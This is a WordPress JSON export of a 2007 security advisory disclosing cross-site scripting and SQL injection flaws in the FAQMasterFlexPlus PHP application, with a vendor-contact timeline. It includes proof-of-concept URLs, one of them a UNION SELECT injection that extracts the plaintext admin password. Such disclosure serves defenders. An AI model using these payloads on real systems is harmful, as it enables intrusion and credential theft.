{"id":65,"date":"2007-12-31T18:53:33","date_gmt":"2007-12-31T17:53:33","guid":{"rendered":"https:\/\/blogs.ua.es\/jgaliana\/2007\/12\/31\/faqmasterflexplus-multiple-vulnerabilities\/"},"modified":"2008-02-08T12:36:51","modified_gmt":"2008-02-08T11:36:51","slug":"faqmasterflexplus-multiple-vulnerabilities","status":"publish","type":"post","link":"https:\/\/blogs.ua.es\/jgaliana\/2007\/12\/31\/faqmasterflexplus-multiple-vulnerabilities\/","title":{"rendered":"FAQMasterFlexPlus multiple vulnerabilities"},"content":{"rendered":"<p>&#8211; Security Advisory &#8211;<\/p>\n<p>&#8211; FAQMasterFlexPlus multiple vulnerabilities &#8211;<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p>Product:        FAQMasterFlexPlus<br \/>\nVersion:        Latest version is affected, other not tested<br \/>\nVendor:         http:\/\/www.netbizcity.com<br \/>\nAffected by:    Cross-Site Scripting &amp; SQL injection<\/p>\n<p>I. Introduction.<\/p>\n<p>FaqMasterFlexPlus is a free, database-driven web-based application written in php for creating and maintaining<br \/>\nFrequently Asked Questions (FAQs) on your web site.<br \/>\nIt has language support and features according documentation are: &#8220;Allow to create unlimited categories and unlimited<br \/>\nQuestions\/Answers and has web-based category and FAQ administration with Add, Edit, Delete Capability.&#8221;,<\/p>\n<p>It&#8217;s free software, released under the GNU General Public Lisence (GPL).<br \/>\nWorks with php &amp; mysql and comes bundled in some versions of Fantastico (Cpanel X).<\/p>\n<p>II. Description<\/p>\n<p>Multiple flaws in FaqMasterFlexPlus have been discovered:<\/p>\n<p>1) Cross Site Scripting:<\/p>\n<p>The script faq.php suffers an XSS bug, specifically the variable $cat_name it&#8217;s not properly sanitized,<br \/>\nan attacker exploiting this flaw can perform an XSS attack to access the targeted user cookies.<\/p>\n<p>All Admin scripts to add\/edit\/delete categories and add\/edit\/delete faq don&#8217;t parse correctly the user supplied input too.<\/p>\n<p>PoC: http:\/\/www.example.com\/[path\/to\/faq\/]\/faq.php?category_id=1&amp;cat_name=[XSS]<\/p>\n<p>2) SQL Injection (to exploit this issue it&#8217;s necesarry magic_quotes_gpc set to Off in the php.ini file).<\/p>\n<p>All the scripts suffers for sql injections attacks in the querys to the database.<\/p>\n<p>PoC: http:\/\/www.example.com\/[path\/to\/faq]\/faq.php?category_id=1&#8217;%20union%20select%201,1,user(),1\/*<\/p>\n<p>Then get a new line like this:<\/p>\n<p>Q faquser@localhost<\/p>\n<p>or a Proof of Concept to get the admin password:<\/p>\n<p>http:\/\/www.example.com\/[path\/to\/faq]\/faq.php?category_id=1&#8217;%20union%20select%201,1,<\/p>\n<p>passwrd,1%20from%20users%20where%20userid=&#8217;admin<\/p>\n<p>Q supersecretpassword<\/p>\n<p>bingo! ;)<\/p>\n<p>Besides password is stored in plain text, this is a big security flaw.<\/p>\n<p>This software is infected with many bugs and must be fully audited for enforce the security.<\/p>\n<p>III. Timeline<\/p>\n<p>08\/05\/2007 &#8211; Bugs discovered<br \/>\n10\/05\/2007 &#8211; Vendor Contact (No Response)<br \/>\n12\/12\/2007 &#8211; Vendor Contacted Again (No Response)<br \/>\n28\/12\/2007 &#8211; Advisory Disclosure<\/p>\n<p>IV. Credits<\/p>\n<p>Juan Galiana &lt;jgaliana gmail com&gt;<\/p>\n<p>Regards<\/p>\n<p><strong>Podeis encontrar el bolet\u00edn de seguridad archivado en estos links: <a href=\"http:\/\/www.securityfocus.com\/bid\/27052\">uno<\/a> y <a href=\"http:\/\/www.securityfocus.com\/bid\/27051\">dos<\/a>.<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8211; Security Advisory &#8211; &#8211; FAQMasterFlexPlus multiple vulnerabilities &#8211; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; Product: FAQMasterFlexPlus Version: Latest version is affected, other not tested Vendor: http:\/\/www.netbizcity.com Affected by: Cross-Site Scripting &amp; SQL injection I. Introduction. FaqMasterFlexPlus is a free, database-driven web-based application written in php for creating and maintaining Frequently Asked Questions (FAQs) on your web site. It has [&hellip;]<\/p>\n","protected":false},"author":139,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[609,488],"tags":[8035,844,841,8034],"class_list":["post-65","post","type-post","status-publish","format-standard","hentry","category-boletin-de-seguridad","category-seguridad","tag-boletin-de-seguridad","tag-faqmasterflexplus","tag-php","tag-seguridad"],"_links":{"self":[{"href":"https:\/\/blogs.ua.es\/jgaliana\/wp-json\/wp\/v2\/posts\/65","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blogs.ua.es\/jgaliana\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blogs.ua.es\/jgaliana\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blogs.ua.es\/jgaliana\/wp-json\/wp\/v2\/users\/139"}],"replies":[{"embeddable":true,"href":"https:\/\/blogs.ua.es\/jgaliana\/wp-json\/wp\/v2\/comments?post=65"}],"version-history":[{"count":0,"href":"https:\/\/blogs.ua.es\/jgaliana\/wp-json\/wp\/v2\/posts\/65\/revisions"}],"wp:attachment":[{"href":"https:\/\/blogs.ua.es\/jgaliana\/wp-json\/wp\/v2\/media?parent=65"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blogs.ua.es\/jgaliana\/wp-json\/wp\/v2\/categories?post=65"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blogs.ua.es\/jgaliana\/wp-json\/wp\/v2\/tags?post=65"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}